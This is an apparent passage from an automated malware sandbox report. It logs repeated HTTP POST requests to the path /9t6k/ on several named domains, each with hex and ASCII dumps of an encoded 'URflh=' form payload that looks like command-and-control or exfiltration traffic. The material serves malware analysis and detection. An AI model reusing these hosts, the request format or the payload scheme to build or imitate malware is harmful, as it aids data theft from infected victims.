6e 33 55 77 6b 6b 4d 63 42 4c 65 55 59 48 43 55 53 6e 55 69 67 50 42 6b 57 4a 70 4c 76 52 50 35 6a 72 57 79 79 37 56 75 65 45 7a 45 6d 68 30 73 6a 39 62 44 32 73 79 6d 4e 58 55 37 4c 46 49 78 4f 30 33 37 62 73 7a 79 43 35 31 69 39 7e 72 79 77 30 57 69 4d 67 49 78 67 43 37 4a 61 76 70 66 4a 4e 7a 76 6a 77 5a 44 37 72 61 7a 4e 6f 4d 4e 46 64 4c 34 6c 65 34 51 78 66 30 43 4e 6a 52 32 62 36 76 6d 50 6f 49 38 5a 50 57 39 72 58 41 71 52 75 37 4b 73 4b 51 52 35 4a 6d 4a 6d 67 79 55 56 30 49 75 57 4a 72 55 78 51 76 36 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=MYh49ja9o8cvm9bmOmM6vdnVPMcqd7l51rvkYszI3WmmSzOP(ANqh3k6m3TZLRZAZKQ7RMjj8xTm7ypQ(itIxcX7FVvY88fo7m6jSah6QQLd3LJ_Osu2DVVDF7jWj0m8QtYk6Dnen5lv(ApyYyNditVhBaHapjRCXYSI~EDaKkWu75OqGnP5(MFA01N6PiDRa0HrHjC9o3KXOe~zkpEtd03HhhKkiejK7f~aMn3UwkkMcBLeUYHCUSnUigPBkWJpLvRP5jrWyy7VueEzEmh0sj9bD2symNXU7LFIxO037bszyC51i9~ryw0WiMgIxgC7JavpfJNzvjwZD7razNoMNFdL4le4Qxf0CNjR2b6vmPoI8ZPW9rXAqRu7KsKQR5JmJmgyUV0IuWJrUxQv6A).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.rodgroup.netConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.rodgroup.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.rodgroup.net/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 78 58 33 30 78 53 34 72 49 4c 54 5f 4d 79 35 71 74 4c 37 2d 6f 48 6e 71 39 32 4b 4d 59 69 57 75 52 59 55 6e 33 4f 5a 75 39 61 42 52 43 49 5a 36 37 5a 76 50 6d 32 54 62 42 6d 46 4b 49 2d 4d 31 79 71 66 52 5a 55 56 4f 4e 41 41 69 74 51 4a 71 6a 44 43 35 7a 4e 54 41 28 72 6e 43 70 76 64 62 63 79 78 58 6f 43 43 61 66 77 52 79 71 67 6d 50 6e 71 78 6a 35 6d 57 51 6c 58 37 74 54 50 69 62 71 77 35 32 4a 39 61 6f 58 33 31 34 6c 62 28 65 53 73 69 34 6a 45 49 2d 39 66 50 38 37 58 71 2d 57 6b 71 39 69 4d 6c 4b 46 78 53 30 53 72 32 57 7a 43 56 64 38 4d 54 65 53 32 66 31 45 72 66 44 37 57 59 71 34 4c 50 4d 57 70 66 63 47 59 44 73 36 6d 47 71 48 30 68 6f 64 37 71 44 41 4f 52 5a 52 47 65 76 6c 53 41 51 71 6d 39 30 4f 51 33 56 38 72 38 53 42 6a 52 56 51 4c 5a 57 54 65 45 46 6f 53 77 61 52 5a 38 52 64 50 42 33 43 6b 52 48 7a 6f 78 56 73 33 62 79 57 73 56 66 65 57 53 35 6d 79 55 46 76 6e 71 77 6d 49 69 31 77 63 6c 54 4e 4f 34 31 7a 4a 35 62 77 71 31 50 4e 30 52 56 70 5f 4d 59 59 4f 67 45 76 4a 79 52 43 6d 68 46 51 78 66 57 38 46 50 65 73 31 65 77 48 73 67 76 7e 6d 46 75 79 41 79 70 46 5f 79 64 71 48 31 47 39 2d 67 68 71 65 6d 37 63 74 57 44 39 76 67 67 4d 77 38 70 79 46 6c 52 55 6d 63 5f 68 31 45 75 78 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=xX30xS4rILT_My5qtL7-oHnq92KMYiWuRYUn3OZu9aBRCIZ67ZvPm2TbBmFKI-M1yqfRZUVONAAitQJqjDC5zNTA(rnCpvdbcyxXoCCafwRyqgmPnqxj5mWQlX7tTPibqw52J9aoX314lb(eSsi4jEI-9fP87Xq-Wkq9iMlKFxS0Sr2WzCVd8MTeS2f1ErfD7WYq4LPMWpfcGYDs6mGqH0hod7qDAORZRGevlSAQqm90OQ3V8r8SBjRVQLZWTeEFoSwaRZ8RdPB3CkRHzoxVs3byWsVfeWS5myUFvnqwmIi1wclTNO41zJ5bwq1PN0RVp_MYYOgEvJyRCmhFQxfW8FPes1ewHsgv~mFuyAypF_ydqH1G9-ghqem7ctWD9vggMw8pyFlRUmc_h1Euxw).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.buttsliders.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.buttsliders.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.buttsliders.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 69 58 65 51 46 6f 76 76 31 30 77 6f 50 32 68 78 42 78 32 48 55 32 58 49 70 57 54 30 30 54 38 75 69 48 6d 5f 70 7a 43 54 38 49 71 70 76 42 65 6a 37 6b 52 33 63 52 63 68 76 6a 76 33 4a 6f 69 7a 72 6e 4c 34 6f 5f 73 4e 37 69 67 37 31 38 31 4b 43 38 49 5f 53 4b 36 35 41 68 57 4d 74 77 33 75 6d 31 36 36 74 48 28 54 4d 41 4a 4d 68 61 78 47 59 52 4c 76 6b 65 41 61 69 37 41 78 66 35 6f 75 4e 52 34 77 62 6c 6c 52 65 7a 78 35 65 4b 77 4e 65 50 63 47 46 75 62 70 64 37 69 6e 34 4f 36 58 61 6d 6c 71 64 68 4e 34 75 46 4c 54 71 47 39 70 7a 67 58 4f 68 65 28 44 51 6b 32 68 5a 58 4b 35 73 2d 6c 72 56 4e 64 6a 55 62 70 31 63 48 70 30 56 6b 44 78 46 5f 43 34 4c 57 70 36 34 57 28 4a 55 56 7e 4d 59 47 34 56 70 30 61 59 35 6e 65 62 33 6a 69 65 4e 61 77 65 55 41 4f 77 6e 77 71 42 45 4a 31 72 43 4f 34 77 78 59 36 42 69 57 4d 4e 51 4a 75 31 53 6f 66 4e 45 73 49 52 66 53 38 71 55 71 68 5a 70 6c 52 74 45 79 4f 71 61 61 62 66 70 73 4a 57 34 6b 53 38 73 55 79 36 62 33 58 79 5a 55 6a 6b 6c 54 77 4f 64 56 77 39 69 72 53 56 6c 57 56 41 31 48 5a 57 43 4c 4e 42 49 61 61 62 55 5f 31 39 55 6d 50 76 45 33 31 35 61 47 48 64 6f 53 54 77 73 4e 38 31 50 36 62 32 64 31 4c 62 31 5f 63 72 7e 30 49 74 6c 75 67 61 6b 2d 4e 6e 58 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=iXeQFovv10woP2hxBx2HU2XIpWT00T8uiHm_pzCT8IqpvBej7kR3cRchvjv3JoizrnL4o_sN7ig7181KC8I_SK65AhWMtw3um166tH(TMAJMhaxGYRLvkeAai7Axf5ouNR4wbllRezx5eKwNePcGFubpd7in4O6XamlqdhN4uFLTqG9pzgXOhe(DQk2hZXK5s-lrVNdjUbp1cHp0VkDxF_C4LWp64W(JUV~MYG4Vp0aY5neb3jieNaweUAOwnwqBEJ1rCO4wxY6BiWMNQJu1SofNEsIRfS8qUqhZplRtEyOqaabfpsJW4kS8sUy6b3XyZUjklTwOdVw9irSVlWVA1HZWCLNBIaabU_19UmPvE315aGHdoSTwsN81P6b2d1Lb1_cr~0Itlugak-NnXA).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.thanksforlove.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.thanksforlove.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.thanksforlove.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 72 52 70 6b 6b 58 33 32 4a 44 73 57 47 78 5a 31 6e 4f 77 45 48 36 4d 65 61 70 78 65 79 76 77 45 31 45 6e 69 6c 6f 55 56 63 38 78 57 78 6c 32 34 51 4e 52 6d 70 79 4f 53 4e 35 55 59 35 69 62 70 48 4f 64 67 4c 76 6b 5a 39 6a 4d 71 68 6f 30 65 66 37 73 78 55 33 47 66 31 4a 52 2d 71 4b 28 2d 48 34 48 4c 6d 4f 58 78 78 59 6f 51 51 4c 43 32 64 6d 53 39 4f 35 72 43 4a 37 76 33 43 6d 30 42 70 4f 41 45 39 4d 46 4c 49 2d 48 59 48 48 67 44 6d 5f 4d 4b 73 75 4b 4a 78 61 4e 35 75 76 6e 51 56 69 46 2d 58 48 5a 4c 78 53 62 50 6f 47 56 31 51 4c 54 7a 7a 5f 38 35 57 41 52 45 4b 5f 71 41 6c 39 66 5a 54 49 55 51 6e 69 4f 7a 67 76 63 78 74 62 45 78 30 75 71 6f 56 58 57 78 73 71 70 54 30 4b 6b 4b 6e 72 59 45 43 36 76 75 6b 4a 44 32 6e 69 56 6e 59 31 28 71 53 33 53 73 32 4b 48 58 49 6b 72 59 33 31 71 59 41 71 32 62 57 59 70 64 4b 6d 59 72 50 56 50 61 30 78 34 66 5a 6c 41 51 72 76 53 50 33 58 6b 37 37 59 51 71 6a 4b 6b 34 79 65 69 7a 54 69 7a 4e 38 73 33 75 6d 6f 73 63 4c 47 6d 4e 6c 43 7e 72 38 6a 35 34 32 79 39 4d 77 31 6f 77 54 4a 58 57 36 30 44 34 73 65 31 48 62 39 52 6d 30 30 56 45 77 63 4d 44 4e 6e 33 4d 41 49 57 6c 51 38 46 5a 7e 33 4d 70 30 51 78 68 41 4b 6a 77 36 42 75 2d 67 38 54 52 4d 70 72 71 59 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=rRpkkX32JDsWGxZ1nOwEH6MeapxeyvwE1EniloUVc8xWxl24QNRmpyOSN5UY5ibpHOdgLvkZ9jMqho0ef7sxU3Gf1JR-qK(-H4HLmOXxxYoQQLC2dmS9O5rCJ7v3Cm0BpOAE9MFLI-HYHHgDm_MKsuKJxaN5uvnQViF-XHZLxSbPoGV1QLTzz_85WAREK_qAl9fZTIUQniOzgvcxtbEx0uqoVXWxsqpT0KkKnrYEC6vukJD2niVnY1(qS3Ss2KHXIkrY31qYAq2bWYpdKmYrPVPa0x4fZlAQrvSP3Xk77YQqjKk4yeizTizN8s3umoscLGmNlC~r8j542y9Mw1owTJXW60D4se1Hb9Rm00VEwcMDNn3MAIWlQ8FZ~3Mp0QxhAKjw6Bu-g8TRMprqYg).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.outtheframecustoms.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.outtheframecustoms.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.outtheframecustoms.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 55 2d 77 75 54 6f 51 53 30 35 54 63 4e 35 51 57 34 79 70 71 32 6f 74 4c 31 51 4e 7a 42 4d 51 33 5a 4b 72 4e 4d 56 6e 6a 35 45 42 41 63 72 64 35 54 7a 78 67 34 61 37 71 4f 47 67 75 4e 47 6c 54 4e 7a 34 4b 6f 7a 46 38 67 4d 65 39 77 6c 38 37 70 6f 49 56 69 78 61 58 73 7a 46 53 64 31 56 77 6b 46 64 61 31 46 69 4c 75 52 46 4a 50 6b 43 38 57 30 4e 6c 48 32 58 68 28 53 5a 46 45 62 77 78 55 50 55 5a 4b 46 47 61 6d 4a 4d 32 53 70 34 59 33 55 6f 4c 43 33 70 30 52 78 47 4e 49 52 72 46 4d 69 4c 30 31 58 42 36 64 45 7a 2d 47 35 65 4f 56 36 57 72 4f 74 63 76 32 39 6b 74 78 73 4d 5f 4d 50 6d 4b 4b 35 43 30 61 48 69 55 6a 53 45 43 4b 53 45 36 74 66 32 74 54 5a 7a 41 62 49 47 65 65 42 37 55 31 72 56 72 74 58 77 36 53 47 6b 41 4f 6b 78 2d 4e 64 73 56 66 57 45 69 58 6c 57 58 4a 6e 46 54 53 64 63 6e 6b 33 7a 76 4d 65 72 53 7e 61 79 36 68 56 46 34 38 4f 38 69 56 4d 55 5f 74 48 6d 35 30 56 58 30 55 33 53 47 7e 49 73 4d 52 6c 6f 53 59 55 52 77 6c 66 43 33 31 35 35 54 53 6b 5a 74 69 64 6f 55 76 4f 50 51 6c 52 74 57 7e 31 43 36 51 64 46 55 71 78 68 6a 39 73 6a 44 65 35 4a 66 58 41 65 6b 65 44 65 38 72 57 51 54 75 54 48 56 48 32 57 66 63 78 33 79 61 55 63 64 52 64 30 48 4b 4f 55 36 64 7a 49 45 42 55 58 37 58 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=U-wuToQS05TcN5QW4ypq2otL1QNzBMQ3ZKrNMVnj5EBAcrd5Tzxg4a7qOGguNGlTNz4KozF8gMe9wl87poIVixaXszFSd1VwkFda1FiLuRFJPkC8W0NlH2Xh(SZFEbwxUPUZKFGamJM2Sp4Y3UoLC3p0RxGNIRrFMiL01XB6dEz-G5eOV6WrOtcv29ktxsM_MPmKK5C0aHiUjSECKSE6tf2tTZzAbIGeeB7U1rVrtXw6SGkAOkx-NdsVfWEiXlWXJnFTSdcnk3zvMerS~ay6hVF48O8iVMU_tHm50VX0U3SG~IsMRloSYURwlfC3155TSkZtidoUvOPQlRtW~1C6QdFUqxhj9sjDe5JfXAekeDe8rWQTuTHVH2Wfcx3yaUcdRd0HKOU6dzIEBUX7XQ).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.theyolokart.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.theyolokart.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.theyolokart.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 28 78 65 56 4c 30 48 61 6e 6f 77 56 4b 36 74 6c 54 46 75 59 46 44 4f 58 49 44 44 64 45 54 79 43 30 33 62 4f 32 4f 75 4e 4d 76 62 66 42 68 64 31 72 42 70 49 75 56 39 6b 75 74 67 58 6e 54 34 47 63 7a 67 6d 62 4e 67 6f 42 55 4a 39 76 34 5a 6c 4e 50 6b 74 64 4d 42 6a 28 39 51 64 4b 42 33 4e 51 39 38 4f 71 4b 73 58 28 66 72 6d 4f 32 6a 33 55 38 72 6a 70 79 39 66 56 6b 78 37 45 64 6b 53 44 4a 44 58 39 57 4a 4d 45 38 34 66 4e 38 32 34 4f 53 65 74 65 56 52 54 77 64 78 67 65 67 52 48 39 7a 4f 71 28 2d 7e 7a 71 4a 35 43 6c 59 68 55 62 63 54 68 37 6a 49 52 72 59 46 79 44 4b 74 57 43 75 41 78 6f 74 4c 71 36 67 70 78 6b 55 7e 47 52 72 44 41 4d 39 4d 76 52 4b 59 58 42 31 65 68 45 35 28 50 7e 47 30 63 39 4b 5a 4d 6f 69 47 38 62 75 36 30 69 4d 6f 66 38 35 35 55 39 36 4b 4c 74 72 63 63 4a 39 79 69 32 41 61 56 6b 6b 71 44 4c 4e 39 4f 41 44 31 4e 39 45 49 32 4f 48 7e 30 36 68 59 38 39 34 76 54 56 39 4f 6e 63 63 66 75 28 69 66 65 6a 63 31 57 4f 56 6d 6c 6b 39 39 6d 6b 79 67 6e 52 48 48 6e 30 4c 53 65 48 52 33 64 4c 6d 42 76 77 59 59 33 6f 4d 38 78 34 59 53 64 39 77 59 35 61 65 4a 56 70 56 52 7a 75 30 41 2d 78 5a 37 49 66 5f 68 71 4a 32 5a 64 72 52 28 39 5a 42 53 48 73 68 39 57 5a 51 38 43 59 62 4e 51 44 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=(xeVL0HanowVK6tlTFuYFDOXIDDdETyC03bO2OuNMvbfBhd1rBpIuV9kutgXnT4GczgmbNgoBUJ9v4ZlNPktdMBj(9QdKB3NQ98OqKsX(frmO2j3U8rjpy9fVkx7EdkSDJDX9WJME84fN824OSeteVRTwdxgegRH9zOq(-~zqJ5ClYhUbcTh7jIRrYFyDKtWCuAxotLq6gpxkU~GRrDAM9MvRKYXB1ehE5(P~G0c9KZMoiG8bu60iMof855U96KLtrccJ9yi2AaVkkqDLN9OAD1N9EI2OH~06hY894vTV9Onccfu(ifejc1WOVmlk99mkygnRHHn0LSeHR3dLmBvwYY3oM8x4YSd9wY5aeJVpVRzu0A-xZ7If_hqJ2ZdrR(9ZBSHsh9WZQ8CYbNQDQ).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.renabbeauty.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.renabbeauty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.renabbeauty.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 30 31 6d 63 5a 4e 51 58 7e 72 72 67 6e 47 52 2d 41 46 42 43 5a 6f 70 64 32 79 55 31 30 6e 63 46 6c 63 30 49 4f 31 51 70 67 55 68 31 66 30 37 44 41 4d 7e 47 61 72 51 58 4f 78 4d 67 44 34 72 6d 78 6e 65 73 64 4f 4a 6e 48 69 72 43 43 36 35 4f 51 4b 56 44 6c 42 4b 46 66 6a 6d 59 71 37 41 4b 7a 58 42 58 5a 65 59 52 61 79 6c 49 47 77 78 41 58 44 32 35 72 4f 51 58 4a 7a 32 41 54 61 35 43 47 62 34 78 47 46 6b 70 4e 39 6c 7a 48 72 28 44 6b 78 43 6a 6b 33 49 36 48 2d 5a 4c 78 62 6c 6b 4c 32 57 5f 33 71 38 64 48 76 37 37 61 53 58 7a 65 31 35 35 75 30 53 50 51 73 7a 4d 46 66 65 55 6d 62 4c 70 39 56 75 6b 4d 49 59 57 76 32 78 37 31 32 75 38 53 2d 4e 30 6c 45 6a 43 56 39 35 61 68 54 75 6d 66 4c 78 7a 68 41 67 76 28 34 7e 31 74 75 64 6f 39 50 57 31 38 61 45 56 76 72 78 54 6f 38 4c 69 45 76 37 41 65 33 76 5f 77 74 30 31 7e 68 59 70 5a 4e 38 76 7a 4b 46 7a 52 41 62 6e 72 79 6d 34 77 71 68 35 6a 58 77 32 79 79 4a 59 4f 69 6d 32 39 76 69 73 58 31 6e 5f 49 74 67 65 72 6d 58 42 71 55 35 59 6f 68 36 59 59 48 4a 36 77 63 31 45 4d 44 4b 4d 6f 73 79 41 52 58 66 62 71 54 38 4b 66 78 7e 5f 75 68 43 30 57 63 77 65 31 70 77 4a 77 79 65 4c 75 4e 55 46 65 4e 42 31 51 5a 62 59 4b 35 56 36 52 57 35 31 7a 61 4e 5f 37 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=01mcZNQX~rrgnGR-AFBCZopd2yU10ncFlc0IO1QpgUh1f07DAM~GarQXOxMgD4rmxnesdOJnHirCC65OQKVDlBKFfjmYq7AKzXBXZeYRaylIGwxAXD25rOQXJz2ATa5CGb4xGFkpN9lzHr(DkxCjk3I6H-ZLxblkL2W_3q8dHv77aSXze155u0SPQszMFfeUmbLp9VukMIYWv2x712u8S-N0lEjCV95ahTumfLxzhAgv(4~1tudo9PW18aEVvrxTo8LiEv7Ae3v_wt01~hYpZN8vzKFzRAbnrym4wqh5jXw2yyJYOim29visX1n_ItgermXBqU5Yoh6YYHJ6wc1EMDKMosyARXfbqT8Kfx~_uhC0Wcwe1pwJwyeLuNUFeNB1QZbYK5V6RW51zaN_7A).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.ahomedokita.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.ahomedokita.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.ahomedokita.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 32 61 76 61 38 79 71 43 6a 6f 52 49 4c 63 65 58 45 56 4d 5f 63 4a 43 33 28 38 4b 58 66 36 39 66 48 36 55 64 79 32 6b 61 74 44 5a 66 55 4b 6e 73 55 57 4e 6e 56 35 33 43 47 76 57 4e 58 45 62 49 54 57 49 4e 35 6d 79 44 7a 5a 71 36 32 2d 45 46 30 77 66 56 39 57 30 42 63 56 37 67 6a 6d 34 6c 39 53 28 36 62 76 45 6b 36 45 7a 2d 68 77 32 4e 4d 79 73 33 64 63 7e 63 56 65 46 64 7a 64 69 66 62 47 48 75 66 64 48 74 76 4d 51 5f 6e 4a 6c 62 50 75 47 34 6d 73 36 39 63 54 38 6f 6b 41 72 74 4c 38 49 35 7e 4b 73 73 46 6e 6a 65 55 4e 44 46 66 71 49 76 4a 70 39 4a 73 56 59 46 30 5f 46 41 69 43 6c 70 62 71 56 46 6d 31 5a 55 50 6c 4a 4e 46 64 30 31 77 35 77 4f 70 2d 6d 48 71 51 31 6c 7a 5a 72 5f 4d 4a 41 55 37 76 33 32 34 63 63 54 70 63 46 69 6f 41 73 75 6d 6e 4d 37 4f 5f 34 63 34 45 76 78 33 47 41 34 4e 37 7a 34 74 49 54 7a 41 48 4a 58 56 5a 4b 71 37 4e 31 38 30 55 75 48 51 55 56 57 31 5f 28 55 78 78 7e 54 38 6e 38 79 41 42 67 62 4d 67 6b 78 4f 75 36 79 30 35 63 71 6d 43 38 6a 58 75 68 73 78 31 6a 52 58 41 4b 72 39 64 7a 41 37 73 28 42 35 4f 76 59 31 41 48 6a 6d 31 30 43 69 6e 7a 4c 41 7a 6c 74 35 79 61 56 35 77 63 7a 4f 7a 77 56 48 42 59 75 64 31 6c 66 62 48 37 71 73 39 64 71 35 56 6a 66 4a 74 34 6a 42 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=2ava8yqCjoRILceXEVM_cJC3(8KXf69fH6Udy2katDZfUKnsUWNnV53CGvWNXEbITWIN5myDzZq62-EF0wfV9W0BcV7gjm4l9S(6bvEk6Ez-hw2NMys3dc~cVeFdzdifbGHufdHtvMQ_nJlbPuG4ms69cT8okArtL8I5~KssFnjeUNDFfqIvJp9JsVYF0_FAiClpbqVFm1ZUPlJNFd01w5wOp-mHqQ1lzZr_MJAU7v324ccTpcFioAsumnM7O_4c4Evx3GA4N7z4tITzAHJXVZKq7N180UuHQUVW1_(Uxx~T8n8yABgbMgkxOu6y05cqmC8jXuhsx1jRXAKr9dzA7s(B5OvY1AHjm10CinzLAzlt5yaV5wczOzwVHBYud1lfbH7qs9dq5VjfJt4jBg).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.dainikamarsomoy.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.dainikamarsomoy.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.dainikamarsomoy.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 5a 35 62 49 47 78 76 62 56 32 6e 41 6c 32 79 65 49 63 69 69 6c 70 7a 33 6c 55 38 77 5a 75 38 52 51 2d 76 46 4a 7a 61 45 78 70 4b 7a 4a 74 51 76 4c 56 5a 57 35 31 37 63 44 32 74 6e 59 65 53 7a 48 6d 45 32 28 36 46 51 32 39 79 75 6a 50 32 74 67 5f 6d 47 71 30 39 4c 67 6a 4b 53 30 6b 45 75 45 75 70 34 4a 6c 50 41 41 70 5a 58 48 73 68 54 6c 66 57 6c 52 6e 78 52 35 57 28 69 53 55 79 71 4f 32 31 4d 69 58 4f 4d 41 61 41 52 4b 78 4e 58 44 4b 6e 34 6a 6b 50 6e 33 35 36 4d 52 6d 48 53 74 64 7a 61 30 65 6f 41 72 38 38 5f 6d 41 79 71 39 56 48 65 62 38 31 53 44 46 65 43 4b 5f 49 64 69 36 6e 66 43 66 66 79 28 37 79 76 31 44 43 79 4e 6a 33 6b 48 41 68 4e 62 41 61 57 55 36 77 59 55 67 61 62 62 45 56 65 67 47 7e 6b 62 62 79 69 68 38 42 5a 4f 78 59 6d 55 52 72 66 32 53 30 48 61 70 63 68 70 63 74 76 6d 76 4c 6b 6b 35 56 4d 41 53 4c 53 70 33 70 58 51 77 69 64 6d 72 4a 4d 56 67 72 5a 65 52 78 64 6c 65 67 6d 36 32 59 67 72 6f 35 4c 36 49 57 77 74 33 43 71 6a 62 76 32 62 55 6d 33 42 64 69 5a 32 67 4a 4a 38 49 6f 4f 57 41 28 49 75 69 74 46 30 63 4f 76 4f 6b 28 61 57 57 30 55 32 57 43 37 28 66 6a 50 41 61 49 48 31 35 76 54 32 32 52 46 78 4a 28 6a 45 33 51 30 50 67 75 46 4d 54 58 73 38 32 66 54 45 6b 5a 46 65 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=Z5bIGxvbV2nAl2yeIciilpz3lU8wZu8RQ-vFJzaExpKzJtQvLVZW517cD2tnYeSzHmE2(6FQ29yujP2tg_mGq09LgjKS0kEuEup4JlPAApZXHshTlfWlRnxR5W(iSUyqO21MiXOMAaARKxNXDKn4jkPn356MRmHStdza0eoAr88_mAyq9VHeb81SDFeCK_Idi6nfCffy(7yv1DCyNj3kHAhNbAaWU6wYUgabbEVegG~kbbyih8BZOxYmURrf2S0HapchpctvmvLkk5VMASLSp3pXQwidmrJMVgrZeRxdlegm62Ygro5L6IWwt3Cqjbv2bUm3BdiZ2gJJ8IoOWA(IuitF0cOvOk(aWW0U2WC7(fjPAaIH15vT22RFxJ(jE3Q0PguFMTXs82fTEkZFeg).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.kingdomwinecommunity.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.kingdomwinecommunity.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.kingdomwinecommunity.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 50 6f 7a 79 71 59 39 35 71 50 52 42 4c 66 4b 76 57 6e 5a 44 4d 7a 59 37 4e 50 62 72 37 59 65 70 7a 62 68 4e 36 73 76 7a 7e 61 51 58 41 4c 63 55 47 51 42 68 7a 59 63 4e 73 4c 32 6e 6a 43 64 69 37 62 56 71 50 59 7a 6c 58 47 76 79 30 5f 56 6a 65 37 78 4d 43 46 61 57 75 46 72 32 45 71 62 4b 79 78 35 55 64 30 5a 38 64 49 7e 6b 79 4e 6c 51 62 49 39 6f 71 6b 4e 68 36 6d 4a 79 74 32 53 32 74 44 35 43 38 58 73 4a 68 78 45 4b 67 31 75 32 74 73 36 64 53 43 4c 36 52 4a 35 55 54 78 61 72 46 54 4f 37 67 53 4d 6d 28 35 50 58 62 32 76 75 35 33 56 44 28 4e 64 6a 45 4c 4a 65 62 6b 28 6f 59 39 75 63 6b 62 55 6f 73 53 4a 2d 6e 79 50 38 6f 6e 50 78 6f 7a 78 5a 49 4d 6d 38 69 50 4a 54 66 30 6d 77 37 74 39 78 4e 69 72 63 72 66 33 61 61 62 69 76 4c 64 59 46 53 62 49 4b 68 6b 53 31 65 49 54 46 55 53 51 54 6f 6a 47 38 47 36 67 69 6c 46 70 37 64 49 68 46 64 52 37 50 32 55 30 66 55 56 74 39 45 48 59 37 6f 48 46 64 6f 67 35 49 6d 43 78 4d 61 4a 54 70 79 37 33 4c 45 76 44 63 56 76 63 31 45 5a 37 36 76 68 55 49 6d 59 31 71 6a 4e 72 51 7e 46 49 44 51 47 4c 66 59 70 4c 33 53 35 4a 53 4f 65 62 70 48 6a 53 72 50 6e 54 75 31 4c 64 75 35 39 53 4c 67 46 44 38 73 54 55 4c 68 43 51 38 41 44 46 5f 49 54 59 41 48 67 28 75 36 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=PozyqY95qPRBLfKvWnZDMzY7NPbr7YepzbhN6svz~aQXALcUGQBhzYcNsL2njCdi7bVqPYzlXGvy0_Vje7xMCFaWuFr2EqbKyx5Ud0Z8dI~kyNlQbI9oqkNh6mJyt2S2tD5C8XsJhxEKg1u2ts6dSCL6RJ5UTxarFTO7gSMm(5PXb2vu53VD(NdjELJebk(oY9uckbUosSJ-nyP8onPxozxZIMm8iPJTf0mw7t9xNircrf3aabivLdYFSbIKhkS1eITFUSQTojG8G6gilFp7dIhFdR7P2U0fUVt9EHY7oHFdog5ImCxMaJTpy73LEvDcVvc1EZ76vhUImY1qjNrQ~FIDQGLfYpL3S5JSOebpHjSrPnTu1Ldu59SLgFD8sTULhCQ8ADF_ITYAHg(u6Q).
